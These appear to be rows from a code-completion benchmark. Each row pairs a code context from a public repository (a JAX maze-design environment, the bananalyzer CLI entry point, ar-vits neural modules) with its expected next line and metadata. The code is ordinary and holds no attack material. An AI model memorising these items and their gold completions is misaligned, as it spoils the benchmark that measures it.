collision = (collision * (1-is_agent_dir_step)).astype(jnp.uint32)
action = (1-collision)*action + \
collision*jax.random.choice(collision_rng, all_pos, replace=False, p=pos_dist)
enc_idx = (1-is_agent_dir_step)*state.time + is_agent_dir_step*(-1)
encoding = state.encoding.at[enc_idx].set(action)
next_state = next_state.replace(
encoding=encoding,
terminal=done
)
reward = 0
obs = self._add_noise_to_obs(noise_rng, self.get_obs(next_state))
return (
lax.stop_gradient(obs),
lax.stop_gradient(next_state),
reward,
done,
{},
)
def get_env_instance(
self,
key: chex.PRNGKey,
state: EnvState
) -> chex.Array:
"""
Converts internal encoding to an instance encoding that
can be interpreted by the `set_to_instance` method
        of the paired Environment class.
"""
params = self.params
h = params.height
w = params.width
enc = state.encoding
# === Extract agent_dir, agent_pos, and goal_pos ===
# Num walls placed currently
if params.fixed_n_wall_steps:
n_walls = params.n_walls
enc_len = self._get_encoding_dim()
wall_pos_idx = jnp.flip(enc[:params.n_walls])
agent_pos_idx = enc_len-2 # Enc is full length
goal_pos_idx = enc_len-3
else:
n_walls = jnp.round(
params.n_walls*enc[0]/self.n_tiles
).astype(jnp.uint32)
if params.first_wall_pos_sets_budget:
wall_pos_idx = jnp.flip(enc[:params.n_walls]) # So 0-padding does not override pos=0
enc_len = n_walls + 2 # [wall_pos] + len((goal, agent))
else:
wall_pos_idx = jnp.flip(enc[1:params.n_walls+1])
enc_len = n_walls + 3 # [wall_pos] + len((n_walls, goal, agent))
agent_pos_idx = enc_len-1 # Positions are relative to n_walls when n_walls is variable.
goal_pos_idx = enc_len-2
# Get agent + goal info (set agent/goal pos 1-step out of range if they are not yet placed)
goal_placed = state.time > jnp.array([goal_pos_idx], dtype=jnp.uint32)
goal_pos = \
goal_placed*jnp.array([enc[goal_pos_idx]%w, enc[goal_pos_idx]//w], dtype=jnp.uint32) \
+ (~goal_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_placed = state.time > jnp.array([agent_pos_idx], dtype=jnp.uint32)
agent_pos = \
agent_placed*jnp.array([enc[agent_pos_idx]%w, enc[agent_pos_idx]//w], dtype=jnp.uint32) \
+ (~agent_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_dir_idx = jnp.floor((4*enc[-1]/self.n_tiles)).astype(jnp.uint8)
# Make wall map
wall_start_time = jnp.logical_and( # 1 if explicitly predict # blocks, else 0
not params.fixed_n_wall_steps,
not params.first_wall_pos_sets_budget
).astype(jnp.uint32)
wall_map = jnp.zeros(h*w, dtype=jnp.bool_)
wall_values = jnp.arange(params.n_walls) + wall_start_time < jnp.minimum(state.time, n_walls + wall_start_time)
wall_values = jnp.flip(wall_values)
wall_map = wall_map.at[wall_pos_idx].set(wall_values)
# Zero out walls where agent and goal reside
agent_mask = agent_placed*(~(jnp.arange(h*w) == state.encoding[agent_pos_idx])) + ~agent_placed*wall_map
goal_mask = goal_placed*(~(jnp.arange(h*w) == state.encoding[goal_pos_idx])) + ~goal_placed*wall_map
wall_map = wall_map*agent_mask*goal_mask
wall_map = wall_map.reshape(h,w)
| """
Copyright (c) Meta Platforms, Inc. and affiliates.
All rights reserved.
This source code is licensed under the license found in the
LICENSE file in the root directory of this source tree.
"""
class SequentialActions(IntEnum):
skip = 0
wall = 1
goal = 2
agent = 3
@struct.dataclass
class EnvState:
encoding: chex.Array
time: int
terminal: bool
@struct.dataclass
class EnvParams:
height: int = 15
width: int = 15
n_walls: int = 25
noise_dim: int = 50
replace_wall_pos: bool = False
fixed_n_wall_steps: bool = False
first_wall_pos_sets_budget: bool = False
    use_seq_actions: bool = False
set_agent_dir: bool = False
normalize_obs: bool = False
singleton_seed: int = -1
class UEDMaze(environment.Environment):
def __init__(
self,
height=13,
width=13,
n_walls=25,
noise_dim=16,
replace_wall_pos=False,
fixed_n_wall_steps=False,
first_wall_pos_sets_budget=False,
use_seq_actions=False,
set_agent_dir=False,
normalize_obs=False,
):
"""
Using the original action space requires ensuring proper handling
of a sequence with trailing dones, e.g. dones: 0 0 0 0 1 1 1 1 1 ... 1.
Advantages and value losses should only be computed where ~dones[0].
"""
assert not (first_wall_pos_sets_budget and fixed_n_wall_steps), \
'Setting first_wall_pos_sets_budget=True requires fixed_n_wall_steps=False.'
super().__init__()
self.n_tiles = height*width
        self.action_set = jnp.array(jnp.arange(self.n_tiles))  # each action selects a tile position on the grid
self.params = EnvParams(
height=height,
width=width,
n_walls=n_walls,
noise_dim=noise_dim,
replace_wall_pos=replace_wall_pos,
fixed_n_wall_steps=fixed_n_wall_steps,
first_wall_pos_sets_budget=first_wall_pos_sets_budget,
use_seq_actions=False,
set_agent_dir=set_agent_dir,
normalize_obs=normalize_obs,
)
@staticmethod
def align_kwargs(kwargs, other_kwargs):
kwargs.update(dict(
height=other_kwargs['height'],
width=other_kwargs['width'],
))
return kwargs
def _add_noise_to_obs(self, rng, obs):
if self.params.noise_dim > 0:
noise = jax.random.uniform(rng, (self.params.noise_dim,))
obs.update(dict(noise=noise))
return obs
def reset_env(
self,
key: chex.PRNGKey):
"""
Prepares the environment state for a new design
from a blank slate.
"""
params = self.params
noise_rng, dir_rng = jax.random.split(key)
encoding = jnp.zeros((self._get_encoding_dim(),), dtype=jnp.uint32)
if not params.set_agent_dir:
rand_dir = jax.random.randint(dir_rng, (), minval=0, maxval=4) # deterministic
tile_scale_dir = jnp.ceil((rand_dir/4)*self.n_tiles).astype(jnp.uint32)
encoding = encoding.at[-1].set(tile_scale_dir)
state = EnvState(
encoding=encoding,
time=0,
terminal=False,
)
obs = self._add_noise_to_obs(
noise_rng,
self.get_obs(state)
)
return obs, state
def step_env(
self,
key: chex.PRNGKey,
state: EnvState,
action: int,
) -> Tuple[chex.Array, EnvState, float, bool, dict]:
"""
Take a design step.
action: A pos as an int from 0 to (height*width)-1
"""
params = self.params
collision_rng, noise_rng = jax.random.split(key)
# Sample a random free tile in case of a collision
dist_values = jnp.logical_and( # True if position taken
jnp.ones(params.n_walls + 2),
jnp.arange(params.n_walls + 2)+1 > state.time
)
# Get zero-indexed last wall time step
if params.fixed_n_wall_steps:
max_n_walls = params.n_walls
encoding_pos = state.encoding[:params.n_walls+2]
last_wall_step_idx = max_n_walls - 1
else:
max_n_walls = jnp.round(
params.n_walls*state.encoding[0]/self.n_tiles).astype(jnp.uint32)
if self.params.first_wall_pos_sets_budget:
encoding_pos = state.encoding[:params.n_walls+2]
last_wall_step_idx = jnp.maximum(max_n_walls,1) - 1
else:
encoding_pos = state.encoding[1:params.n_walls+3]
last_wall_step_idx = max_n_walls
pos_dist = jnp.ones(self.n_tiles).at[
jnp.flip(encoding_pos)].set(jnp.flip(dist_values))
all_pos = jnp.arange(self.n_tiles, dtype=jnp.uint32)
# Only mark collision if replace_wall_pos=False OR the agent is placed over the goal
goal_step_idx = last_wall_step_idx + 1
agent_step_idx = last_wall_step_idx + 2
# Track whether it is the last time step
next_state = state.replace(time=state.time + 1)
done = self.is_terminal(next_state)
# Always place agent idx in last enc position.
is_agent_dir_step = jnp.logical_and(
params.set_agent_dir,
done
)
collision = jnp.logical_and(
pos_dist[action] < 1,
jnp.logical_or(
not params.replace_wall_pos,
jnp.logical_and( # agent pos cannot override goal
jnp.equal(state.time, agent_step_idx),
jnp.equal(state.encoding[goal_step_idx], action)
)
)
)
collision = (collision * (1-is_agent_dir_step)).astype(jnp.uint32)
action = (1-collision)*action + \
collision*jax.random.choice(collision_rng, all_pos, replace=False, p=pos_dist)
enc_idx = (1-is_agent_dir_step)*state.time + is_agent_dir_step*(-1)
encoding = state.encoding.at[enc_idx].set(action)
next_state = next_state.replace(
encoding=encoding,
terminal=done
)
reward = 0
obs = self._add_noise_to_obs(noise_rng, self.get_obs(next_state))
return (
lax.stop_gradient(obs),
lax.stop_gradient(next_state),
reward,
done,
{},
)
def get_env_instance(
self,
key: chex.PRNGKey,
state: EnvState
) -> chex.Array:
"""
Converts internal encoding to an instance encoding that
can be interpreted by the `set_to_instance` method
        of the paired Environment class.
"""
params = self.params
h = params.height
w = params.width
enc = state.encoding
# === Extract agent_dir, agent_pos, and goal_pos ===
# Num walls placed currently
if params.fixed_n_wall_steps:
n_walls = params.n_walls
enc_len = self._get_encoding_dim()
wall_pos_idx = jnp.flip(enc[:params.n_walls])
agent_pos_idx = enc_len-2 # Enc is full length
goal_pos_idx = enc_len-3
else:
n_walls = jnp.round(
params.n_walls*enc[0]/self.n_tiles
).astype(jnp.uint32)
if params.first_wall_pos_sets_budget:
wall_pos_idx = jnp.flip(enc[:params.n_walls]) # So 0-padding does not override pos=0
enc_len = n_walls + 2 # [wall_pos] + len((goal, agent))
else:
wall_pos_idx = jnp.flip(enc[1:params.n_walls+1])
enc_len = n_walls + 3 # [wall_pos] + len((n_walls, goal, agent))
agent_pos_idx = enc_len-1 # Positions are relative to n_walls when n_walls is variable.
goal_pos_idx = enc_len-2
# Get agent + goal info (set agent/goal pos 1-step out of range if they are not yet placed)
goal_placed = state.time > jnp.array([goal_pos_idx], dtype=jnp.uint32)
goal_pos = \
goal_placed*jnp.array([enc[goal_pos_idx]%w, enc[goal_pos_idx]//w], dtype=jnp.uint32) \
+ (~goal_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_placed = state.time > jnp.array([agent_pos_idx], dtype=jnp.uint32)
agent_pos = \
agent_placed*jnp.array([enc[agent_pos_idx]%w, enc[agent_pos_idx]//w], dtype=jnp.uint32) \
+ (~agent_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_dir_idx = jnp.floor((4*enc[-1]/self.n_tiles)).astype(jnp.uint8)
# Make wall map
wall_start_time = jnp.logical_and( # 1 if explicitly predict # blocks, else 0
not params.fixed_n_wall_steps,
not params.first_wall_pos_sets_budget
).astype(jnp.uint32)
wall_map = jnp.zeros(h*w, dtype=jnp.bool_)
wall_values = jnp.arange(params.n_walls) + wall_start_time < jnp.minimum(state.time, n_walls + wall_start_time)
wall_values = jnp.flip(wall_values)
wall_map = wall_map.at[wall_pos_idx].set(wall_values)
# Zero out walls where agent and goal reside
agent_mask = agent_placed*(~(jnp.arange(h*w) == state.encoding[agent_pos_idx])) + ~agent_placed*wall_map
goal_mask = goal_placed*(~(jnp.arange(h*w) == state.encoding[goal_pos_idx])) + ~goal_placed*wall_map
wall_map = wall_map*agent_mask*goal_mask
wall_map = wall_map.reshape(h,w)
| return EnvInstance( | 0 | 2023-10-28 12:12:01+00:00 | 4k |
reworkd/bananalyzer | bananalyzer/__main__.py | [
{
"identifier": "AgentRunner",
"path": "bananalyzer/runner/agent_runner.py",
"snippet": "class AgentRunner(ABC):\n \"\"\"\n Wrapper class clients must implement to run an agent against the evaluations\n \"\"\"\n\n @abstractmethod\n async def run(\n self,\n page: Page,\n eval_context: Example,\n ) -> AgentResult:\n pass"
},
{
"identifier": "get_test_examples",
"path": "bananalyzer/data/examples.py",
"snippet": "def get_test_examples() -> List[Example]:\n return load_examples_at_path(get_examples_path(), test_examples_name)"
},
{
"identifier": "get_training_examples",
"path": "bananalyzer/data/examples.py",
"snippet": "def get_training_examples() -> List[Example]:\n return load_examples_at_path(get_examples_path(), train_examples_name)"
},
{
"identifier": "download_examples",
"path": "bananalyzer/data/examples.py",
"snippet": "def download_examples() -> None:\n \"\"\"\n Downloads the repo via git and places contents of the `/static` data directory in ~/.bananalyzer_data\n \"\"\"\n repo_url = \"https://github.com/reworkd/bananalyzer.git\"\n branch = \"main\"\n data_folder_name = \"static/\"\n\n try:\n subprocess.run(\n [\"git\", \"clone\", \"-b\", branch, repo_url, \"repo_temp\"], check=True\n )\n\n data_folder_path = Path(\"repo_temp\") / data_folder_name\n if not data_folder_path.exists():\n raise FileNotFoundError(\n f\"The folder '{data_folder_name}' does not exist in the repository.\"\n )\n\n downloaded_examples_path.mkdir(parents=True, exist_ok=True)\n for item in downloaded_examples_path.iterdir():\n if item.is_dir():\n shutil.rmtree(item)\n else:\n item.unlink()\n\n for item in data_folder_path.iterdir():\n target_path = shutil.move(str(item), downloaded_examples_path)\n for root, dirs, files in os.walk(target_path):\n for file in files:\n convert_to_crlf(Path(root) / file)\n\n finally:\n print(\"Cleaning up repo...\")\n shutil.rmtree(\"repo_temp\", ignore_errors=True)"
},
{
"identifier": "PytestTestGenerator",
"path": "bananalyzer/runner/generator.py",
"snippet": "class PytestTestGenerator:\n def __init__(self) -> None:\n self._classnames: Dict[str, int] = {}\n\n def generate_test(self, example: Example) -> BananalyzerTest:\n return BananalyzerTest(\n code=f\"\"\"\[email protected]\nclass {self._generate_class_name(example)}:\n\n @classmethod\n def setup_class(cls):\n cls.example = get_example_by_url(\"{example.url}\")\n\n\n @pytest_asyncio.fixture(scope=\"class\")\n async def result(self, page, agent):\n yield await agent.run(page, self.example)\n\n {\"\".join(self._generate_eval_test(eval_, i, {\n \"category\": example.category,\n \"subcategory\": example.subcategory,\n \"type\": example.type,\n }) for i, eval_ in enumerate(example.evals))}\n\"\"\",\n example=example,\n )\n\n @staticmethod\n def _generate_eval_test(eval_: Eval, i: int, attrs: dict[str, str]) -> str:\n marks = \"\\n \".join(\n f\"@pytest.mark.{MARKER_PREFIX}{k}('{v}')\" for k, v in attrs.items()\n )\n\n if eval_.type == \"json_match\" and isinstance(eval_.expected, dict):\n return f\"\"\"\n {marks}\n @pytest.mark.parametrize(\"key\", {list(eval_.expected.keys())})\n async def test_match_field(self, key, result) -> None:\n self.example.evals[{i}].eval_results(None, result, field=key)\n\n\"\"\"\n return f\"\"\"\n {marks}\n async def test_{eval_.type}(self, page, result) -> None:\n self.example.evals[{i}].eval_results(page, result)\n\n\"\"\"\n\n def _generate_class_name(self, example: Example) -> str:\n domain = urlparse(example.url).netloc\n domain = domain.replace(\".\", \"_\")\n domain = domain.replace(\"-\", \"_\")\n if domain.startswith(\"www_\"):\n domain = domain[4:]\n\n domain = \"\".join([part.capitalize() for part in domain.split(\"_\")])\n\n key = f\"{example.type.capitalize()}{domain}\"\n self._classnames[key] = self._classnames.get(key, -1) + 1\n suffix = \"\" if not self._classnames[key] else f\"{self._classnames[key] + 1}\"\n return f\"Test{key}{suffix}_{example.id.replace('-', '_')}\""
},
{
"identifier": "run_tests",
"path": "bananalyzer/runner/runner.py",
"snippet": "def run_tests(\n tests: List[BananalyzerTest],\n runner: AgentRunnerClass,\n pytest_args: PytestArgs,\n xdist_args: XDistArgs,\n headless: bool = False,\n single_browser_instance: bool = False,\n) -> int:\n \"\"\"\n Create temporary test files based on intent, run them, and then delete them\n \"\"\"\n intents = {test.example.type for test in tests}\n intent_separated_tests = [\n [test for test in tests if test.example.type == intent] for intent in intents\n ]\n\n cache_dir = Path(os.getcwd()) / \".banana_cache\"\n cache_dir.mkdir(exist_ok=True)\n with open(cache_dir / \".gitignore\", \"w\") as f:\n f.write(\"# Generated by bananalyzer automatically\\n*\")\n\n with tempfile.TemporaryDirectory(dir=cache_dir) as temp_dir:\n temp_path = Path(temp_dir)\n\n test_file_names = [\n create_test_file(\n tests,\n f\"{tests[0].example.type}_intent_\",\n temp_path,\n runner,\n headless,\n single_browser_instance,\n )\n for tests in intent_separated_tests\n ]\n\n args = (\n test_file_names\n + [\"-s\"] * pytest_args.s\n + ([\"-q\"] if pytest_args.q else [\"-vvv\"])\n + [\"-n\", str(xdist_args.n)]\n + [\"--dist\", xdist_args.dist]\n + [f\"--junitxml={pytest_args.xml}\"] * bool(pytest_args.xml)\n + [\"--disable-warnings\"]\n )\n\n kwargs = dict()\n if not xdist_args.n:\n kwargs[\"plugins\"] = [BananalyzerPytestPlugin()]\n else:\n hooks = Path(__file__).parent.parent / \"hooks.py\"\n shutil.copy(hooks, temp_path / \"conftest.py\")\n\n exit_code = pytest.main(args, **kwargs)\n if pytest_args.xml:\n enrich_report(pytest_args.xml)\n\n return exit_code"
},
{
"identifier": "AgentRunnerClass",
"path": "bananalyzer/schema.py",
"snippet": "class AgentRunnerClass(BaseModel):\n class_name: str\n class_path: str"
},
{
"identifier": "Args",
"path": "bananalyzer/schema.py",
"snippet": "class Args(BaseModel):\n path: Union[str, Literal[\"DOWNLOAD_ONLY\"]]\n headless: bool\n single_browser_instance: bool\n id: Optional[str] = Field(default=None)\n domain: Optional[str] = Field(default=None)\n intent: Optional[GoalType] = Field(default=None)\n category: Optional[str] = Field(default=None)\n subcategory: Optional[str] = Field(default=None)\n skip: List[str]\n type: Optional[str] = Field(default=None)\n download: bool\n test: bool\n count: Optional[int]\n pytest_args: PytestArgs\n xdist_args: XDistArgs"
},
{
"identifier": "PytestArgs",
"path": "bananalyzer/schema.py",
"snippet": "class PytestArgs(BaseModel):\n s: bool\n q: bool\n xml: Optional[str] = Field(description=\"Path to the xml report file\")"
},
{
"identifier": "XDistArgs",
"path": "bananalyzer/schema.py",
"snippet": "class XDistArgs(BaseModel):\n dist: XDistDistributionMode = Field(description=\"Distribution mode (xdist)\")\n n: Union[int, Literal[\"logical\", \"auto\"]] = Field(\n description=\"Number of workers (xdist)\"\n )"
}
] | import argparse
import ast
import importlib.util
import sys
from pathlib import Path
from typing import List
from urllib.parse import urlparse
from bananalyzer import AgentRunner
from bananalyzer.data.examples import (
get_test_examples,
get_training_examples,
download_examples,
)
from bananalyzer.runner.generator import PytestTestGenerator
from bananalyzer.runner.runner import run_tests
from bananalyzer.schema import AgentRunnerClass, Args, PytestArgs, XDistArgs | 3,082 | "--id",
type=str,
default=None,
help="Filter tests by id. "
"Ids could be of shape a4c8292a_079c_4e49_bca1_cf7c9da205ec or a4c8292a-079c-4e49-bca1-cf7c9da205ec",
)
parser.add_argument(
"-d",
"--domain",
type=str,
default=None,
help="Filter tests by a particular URL domain",
)
parser.add_argument(
"-i",
"--intent",
type=str,
default=None,
help="Filter tests by a particular intent",
)
parser.add_argument(
"-c",
"--category",
type=str,
default=None,
help="Filter tests by a particular category",
)
parser.add_argument(
"--subcategory",
type=str,
default=None,
help="Filter tests by a particular subcategory",
)
parser.add_argument(
"-n",
"--n",
type=str,
default="logical",
help="Number of test workers to use. The default is 1",
)
parser.add_argument(
"-skip",
"--skip",
type=lambda s: s.split(","),
default=[],
help="A list of ids to skip tests on, separated by commas",
)
parser.add_argument(
"-q",
"--quiet",
action="store_true",
help="Will decrease the verbosity of pytest. By default we run with the `--v` pytest param.",
)
parser.add_argument(
"--single_browser_instance",
action="store_true",
help="Run tests in a single browser instance as opposed to creating a browser "
"instance per test. This is faster but less reliable as test contexts can "
"occasionally bleed into each other, causing tests to fail",
)
parser.add_argument(
"--type",
type=str,
default=None,
help="Filter tests by a particular type",
)
parser.add_argument(
"--download",
action="store_true",
help="Will re-download training and test examples",
)
parser.add_argument(
"--test",
action="store_true",
help="Use test set examples instead of training set examples",
)
parser.add_argument(
"--count",
type=int,
default=None,
help="The number of times to run an individual test. Won't work for detail pages",
)
parser.add_argument(
"--junitxml",
type=str,
default=None,
help="The path for the junitxml report file",
)
parser.add_argument(
"--dist",
type=str,
default="loadscope",
help="The distribution mode for pytest-xdist",
)
args = parser.parse_args()
if args.download and not args.path:
args.path = "DOWNLOAD_ONLY"
if not args.path:
print(
f"Please provide the path to a {file_name} file. "
f"Use the --help flag for more information."
)
exit(1)
return Args(
path=args.path,
headless=args.headless,
intent=args.intent,
id=args.id,
domain=args.domain,
category=args.category,
subcategory=args.subcategory,
skip=args.skip,
single_browser_instance=args.single_browser_instance,
type=args.type,
test=args.test,
download=args.download,
count=args.count,
| # Separate banana-lyzer args from pytest args
# Look for an instance of Banana-lyzer in the current directory
# If it doesn't exist, error
def print_intro() -> None:
# https://www.asciiart.eu/food-and-drinks/bananas
print(
r"""
//\
V \
\ \_
\,'.`-.
|\ `. `.
( \ `. `-. _,.-:\
\ \ `. `-._ __..--' ,-';/
\ `. `-. `-..___..---' _.--' ,'/
`. `. `-._ __..--' ,' /
`. `-_ ``--..'' _.-' ,'
`-_ `-.___ __,--' ,'
`-.__ `----''' __.-'
`--..____..--'
"""
)
print("Bananalyzing... 🍌")
def parse_args() -> Args:
file_name = "bananalyzer-agent.py"
parser = argparse.ArgumentParser(
description="Run the agent inside a bananalyzer agent definition file "
"against the benchmark",
)
parser.add_argument(
"path", type=str, nargs="?", default=None, help=f"Path to the {file_name} file"
)
parser.add_argument(
"--headless", action="store_true", help="Whether to run headless or not"
)
parser.add_argument(
"-s",
"--s",
action="store_true",
help="Shortcut for --capture=no in pytest. Will print stdout and stderr",
)
parser.add_argument(
"-id",
"--id",
type=str,
default=None,
help="Filter tests by id. "
"Ids could be of shape a4c8292a_079c_4e49_bca1_cf7c9da205ec or a4c8292a-079c-4e49-bca1-cf7c9da205ec",
)
parser.add_argument(
"-d",
"--domain",
type=str,
default=None,
help="Filter tests by a particular URL domain",
)
parser.add_argument(
"-i",
"--intent",
type=str,
default=None,
help="Filter tests by a particular intent",
)
parser.add_argument(
"-c",
"--category",
type=str,
default=None,
help="Filter tests by a particular category",
)
parser.add_argument(
"--subcategory",
type=str,
default=None,
help="Filter tests by a particular subcategory",
)
parser.add_argument(
"-n",
"--n",
type=str,
default="logical",
help="Number of test workers to use. The default is 1",
)
parser.add_argument(
"-skip",
"--skip",
type=lambda s: s.split(","),
default=[],
help="A list of ids to skip tests on, separated by commas",
)
parser.add_argument(
"-q",
"--quiet",
action="store_true",
help="Will decrease the verbosity of pytest. By default we run with the `--v` pytest param.",
)
parser.add_argument(
"--single_browser_instance",
action="store_true",
help="Run tests in a single browser instance as opposed to creating a browser "
"instance per test. This is faster but less reliable as test contexts can "
"occasionally bleed into each other, causing tests to fail",
)
parser.add_argument(
"--type",
type=str,
default=None,
help="Filter tests by a particular type",
)
parser.add_argument(
"--download",
action="store_true",
help="Will re-download training and test examples",
)
parser.add_argument(
"--test",
action="store_true",
help="Use test set examples instead of training set examples",
)
parser.add_argument(
"--count",
type=int,
default=None,
help="The number of times to run an individual test. Won't work for detail pages",
)
parser.add_argument(
"--junitxml",
type=str,
default=None,
help="The path for the junitxml report file",
)
parser.add_argument(
"--dist",
type=str,
default="loadscope",
help="The distribution mode for pytest-xdist",
)
args = parser.parse_args()
if args.download and not args.path:
args.path = "DOWNLOAD_ONLY"
if not args.path:
print(
f"Please provide the path to a {file_name} file. "
f"Use the --help flag for more information."
)
exit(1)
return Args(
path=args.path,
headless=args.headless,
intent=args.intent,
id=args.id,
domain=args.domain,
category=args.category,
subcategory=args.subcategory,
skip=args.skip,
single_browser_instance=args.single_browser_instance,
type=args.type,
test=args.test,
download=args.download,
count=args.count, | pytest_args=PytestArgs( | 8 | 2023-10-30 16:40:57+00:00 | 4k |
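The bananalyzer CLI above parses its flags with argparse and then packs the namespace into typed Pydantic models (Args, PytestArgs, XDistArgs). A cut-down sketch of that argparse-to-Pydantic hand-off, reusing the comma-splitting trick from the --skip flag; the MiniArgs model is an illustrative subset, not the real schema:

# Hedged sketch of the argparse -> Pydantic pattern used in parse_args above.
import argparse
from typing import List, Optional
from pydantic import BaseModel

class MiniArgs(BaseModel):
    path: str
    headless: bool
    skip: List[str]
    count: Optional[int] = None

def parse_mini_args(argv: Optional[List[str]] = None) -> MiniArgs:
    parser = argparse.ArgumentParser()
    parser.add_argument("path", type=str)
    parser.add_argument("--headless", action="store_true")
    # same trick as the original: split a comma-separated list at parse time
    parser.add_argument("--skip", type=lambda s: s.split(","), default=[])
    parser.add_argument("--count", type=int, default=None)
    ns = parser.parse_args(argv)
    return MiniArgs(path=ns.path, headless=ns.headless, skip=ns.skip, count=ns.count)

print(parse_mini_args(["agent.py", "--skip", "a,b", "--count", "3"]))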
innnky/ar-vits | module/modules.py | [
{
"identifier": "commons",
"path": "module/commons.py",
"snippet": "def init_weights(m, mean=0.0, std=0.01):\ndef get_padding(kernel_size, dilation=1):\ndef convert_pad_shape(pad_shape):\ndef intersperse(lst, item):\ndef kl_divergence(m_p, logs_p, m_q, logs_q):\ndef rand_gumbel(shape):\ndef rand_gumbel_like(x):\ndef slice_segments(x, ids_str, segment_size=4):\ndef rand_slice_segments(x, x_lengths=None, segment_size=4):\ndef get_timing_signal_1d(\n length, channels, min_timescale=1.0, max_timescale=1.0e4):\ndef add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4):\ndef cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1):\ndef subsequent_mask(length):\ndef fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels):\ndef convert_pad_shape(pad_shape):\ndef shift_1d(x):\ndef sequence_mask(length, max_length=None):\ndef generate_path(duration, mask):\ndef clip_grad_value_(parameters, clip_value, norm_type=2):\ndef squeeze(x, x_mask=None, n_sqz=2):\ndef unsqueeze(x, x_mask=None, n_sqz=2):"
},
{
"identifier": "init_weights",
"path": "module/commons.py",
"snippet": "def init_weights(m, mean=0.0, std=0.01):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1:\n m.weight.data.normal_(mean, std)"
},
{
"identifier": "get_padding",
"path": "module/commons.py",
"snippet": "def get_padding(kernel_size, dilation=1):\n return int((kernel_size*dilation - dilation)/2)"
},
{
"identifier": "piecewise_rational_quadratic_transform",
"path": "module/transforms.py",
"snippet": "def piecewise_rational_quadratic_transform(inputs, \n unnormalized_widths,\n unnormalized_heights,\n unnormalized_derivatives,\n inverse=False,\n tails=None, \n tail_bound=1.,\n min_bin_width=DEFAULT_MIN_BIN_WIDTH,\n min_bin_height=DEFAULT_MIN_BIN_HEIGHT,\n min_derivative=DEFAULT_MIN_DERIVATIVE):\n\n if tails is None:\n spline_fn = rational_quadratic_spline\n spline_kwargs = {}\n else:\n spline_fn = unconstrained_rational_quadratic_spline\n spline_kwargs = {\n 'tails': tails,\n 'tail_bound': tail_bound\n }\n\n outputs, logabsdet = spline_fn(\n inputs=inputs,\n unnormalized_widths=unnormalized_widths,\n unnormalized_heights=unnormalized_heights,\n unnormalized_derivatives=unnormalized_derivatives,\n inverse=inverse,\n min_bin_width=min_bin_width,\n min_bin_height=min_bin_height,\n min_derivative=min_derivative,\n **spline_kwargs\n )\n return outputs, logabsdet"
}
] | import math
import numpy as np
import torch
import torch.distributions as D
from torch import nn
from torch.nn import functional as F
from torch.nn import Conv1d
from torch.nn.utils import weight_norm, remove_weight_norm
from module import commons
from module.commons import init_weights, get_padding
from module.transforms import piecewise_rational_quadratic_transform | 2,402 | self.n_layers = n_layers
self.p_dropout = p_dropout
self.drop = nn.Dropout(p_dropout)
self.convs_sep = nn.ModuleList()
self.convs_1x1 = nn.ModuleList()
self.norms_1 = nn.ModuleList()
self.norms_2 = nn.ModuleList()
for i in range(n_layers):
dilation = kernel_size ** i
padding = (kernel_size * dilation - dilation) // 2
self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size,
groups=channels, dilation=dilation, padding=padding
))
self.convs_1x1.append(nn.Conv1d(channels, channels, 1))
self.norms_1.append(LayerNorm(channels))
self.norms_2.append(LayerNorm(channels))
def forward(self, x, x_mask, g=None):
if g is not None:
x = x + g
for i in range(self.n_layers):
y = self.convs_sep[i](x * x_mask)
y = self.norms_1[i](y)
y = F.gelu(y)
y = self.convs_1x1[i](y)
y = self.norms_2[i](y)
y = F.gelu(y)
y = self.drop(y)
x = x + y
return x * x_mask
class WN(torch.nn.Module):
def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0):
super(WN, self).__init__()
assert(kernel_size % 2 == 1)
        self.hidden_channels = hidden_channels
        self.kernel_size = kernel_size
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight')
for i in range(n_layers):
dilation = dilation_rate ** i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size,
dilation=dilation, padding=padding)
in_layer = torch.nn.utils.weight_norm(in_layer, name='weight')
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight')
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(
x_in,
g_l,
n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:,:self.hidden_channels,:]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:,self.hidden_channels:,:]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
